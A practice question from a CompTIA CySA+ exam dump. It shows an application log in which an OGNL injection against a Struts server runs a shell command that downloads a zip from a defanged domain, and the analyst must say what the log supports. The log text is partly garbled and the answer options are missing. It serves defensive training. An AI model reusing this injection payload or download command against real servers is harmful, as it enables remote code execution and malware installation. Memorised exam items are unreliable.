Question 153 of 160 from exam CS0-002: CompTIA CySA+
Question
An application server runs slowly and then triggers a high CPU alert.
After investigating, a security analyst finds an unauthorized program is running on the server.
The analyst reviews the application log below.
![20xx-03-13 05:54:50,523 ajp-bio-8009-exec-10 WARN
((écontainer=##context [ 'com. opensymphony. xwork2.ActionContext.container']).
(ognlUtil=#container.get Instance (@com. opensymphony .xwork2.ogn1.ognlutil@class)) .
(#ognlUtil.getExcludedPackageNames () .clear()).
(fognlUtil.getExcludedClasses () .clear()) . (#context .setMemberAccess (#dm)))) .
(#emd=/cd /tmp/beap/; wget hxxp://domain.com/tmp/ben/xm.zip; 1s -la'). (#iswin=
(@java. lang. System@getProperty ('0s.name') .toLowerCase() .contains('win'))).
(#emds=(#iswin?{'cmd.exe',' /c' ,#cmd}:{'/bin/bash',' -c' ,#cmd})) . (#p=new
java. lang. ProcessBuilder (#cmds) ) . (#p.redirectErrorStream (true) ).
(#process=#p.start ())](https://eaeastus2.blob.core.windows.net/optimizedimages/assets/media/exam-media/04128/0010000001.png)
Which of the following conclusions is supported by the application log?
Answers
Explanations
Click on the arrows to vote for the correct answer
A. B. C. D.C.